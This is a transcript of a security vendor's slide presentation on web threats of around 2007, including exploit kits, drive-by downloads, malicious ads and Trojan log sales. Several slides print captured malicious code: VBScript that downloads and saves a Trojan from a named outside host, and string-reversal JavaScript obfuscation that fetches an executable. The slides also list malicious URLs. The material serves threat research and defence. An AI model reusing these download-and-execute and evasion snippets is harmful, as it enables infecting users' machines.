1 / 39

Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.

Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc. The Business Behind New Exploits. IE Vulnerability For Sale. Buying Vulnerabilities. 4. Exploits Selling Service. Exploits Selling Service. Web Attacker Toolkit - Website.

moses
Download Presentation

Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Latest Threats and Attacks in Web Security Iftach Ian Amit Director, Security Research Finjan inc.

  2. The Business Behind New Exploits

  3. IE Vulnerability For Sale

  4. Buying Vulnerabilities 4

  5. Exploits Selling Service

  6. Exploits Selling Service

  7. Web Attacker Toolkit - Website

  8. Web Attacker Toolkit – AV Will Not Detect It

  9. Web Attacker Toolkit – Order Page

  10. Web Attacker Toolkit – Statistics Report

  11. Neo Sploit Updating the ‘customer’ when new versions are available The recent ‘Release note’ log Important update! Please update our product to v1.0.6 RC! 24 April 2007 - fixed crypt algorithm 16 April 2007 - new exploit module added - removed ANI exploit - fixed crypt algorithm 11 April 2007 - new exploit module added - fixed crypt algorithm 31 March 2007 - new exploit module added 22 March 2007 - new exploit module added 11

  12. MPack Toolkit – Statistics Report 12

  13. Multi Exploit Pack 13

  14. Where are the Malicious Servers? Geo footprint of a singleMPack toolkit operator 14

  15. Drive-by, While Visiting Websites Innocent Free Games site

  16. Exploits our desktop to install a Trojan Drive-by, While Visiting Websites Innocent Free Games site

  17. Drive-by, While Visiting Websites Dynamic Code Obfuscation Each user session includes a different exploit content

  18. Drive-by, While Visiting Websites Free Whois service ….

  19. Drive-by, While Visiting Websites • Exploits the Internet Explorer VML vulnerability • Downloads a spyware • Downloads a malicious JPG file – Trojan.JS.Psyme.ct • Checks the type of Anti-Virus installed • Injects a virus that the installed Anti-Virus does not detect

  20. AJAX-Based Exploits in the Wild, Hosted in the US http ://7dias.t35.com/index2.php (Free Web Hosting, IP: 66.45.237.220, Hosted at: Secaucus, New Jersey, USA)

  21. AJAX-Based Exploits in the Wild, Hosted in the US The Trojan to be downloaded     dl = "http://gigafoto.front.ru/pr.exe"     Set df = document.createElement("object")     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"     str="Microsoft.XMLHTTP"     Set x = df.CreateObject(str,"") str1= "Ado“+ "db.“+ "Str“+ “eam“     str5=str1     set S = df.createobject(str5,"")     str6="GET"     x.Open str6, dl, False     x.Send     set F = df.createobject("Scripting.FileSystemObject","")     set tmp = F.GetSpecialFolder(2) ' Get tmp folder     fname1= F.BuildPath(tmp,fname1)     S.open     S.write x.responseBody     S.savetofile fname1,2     S.close Escape from Anti-Virus signatures AJAX request goes undetected Save Trojan on the victim’s disk

  22. Distributing Malicious Code Using Ads 22

  23. The Malicious Ad 23

  24. Trojan-Based Affiliation Program 24

  25. Trojan-Based Affiliation Program 25

  26. Trojan-Based Affiliation Program – in Action 26

  27. Trojan-Based Affiliation Program 27

  28. How it looks like in the field?

  29. Keeping all this activity under control:Evasive attacks!

  30. Trojan’s Log 30

  31. Trojan’s Log for Sale

  32. Signatures Heuristics URL CAT Reactive Security Technologies… They detect known attacks quickly… BUT THEY Do not stop the next attack Do not stop a targeted attack Require frequent updates Require huge signature / URL databases The next wave of attack A targeted attack

  33. RSS Feed – Malicious Code, Reversed http://www.tv-personalonline.com/rss2/rss.php varfname = "C:\\mssync20.exe"; varurl = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth"); RE(""); var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod"); RE(";)'r_','di'(etubirttAtes.r_"); RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_"); varis_ok= 0; try { var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_"); is_ok= 1; } catch(e){} if (is_ok!= 1) { try { var _s = RE(";)'maerts.bdoda'(tcejbOXevitcAwen"); is_ok= 1; } catch(e){} } 33

  34. RSS Feed – Malicious Code Reversed Reversed functions function RE(s) { return eval(RV(s)); } function RV(s) { var rev = ""; for (i = 0; i < s.length; i++) { rev = s.charAt(i) + rev; } return rev; } 34

  35. RSS Feed – Malicious Code Reversed Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31) 35

  36. Recent Example

  37. Finjan‘s Technology Real-Time Content Inspection (Patented) Inspecting incoming & outgoing code to detect potentially malicious operations (Delete file, Install program, Change settings, etc.)

  38. Audit Results at Customer Networks

  39. Thank you

More Related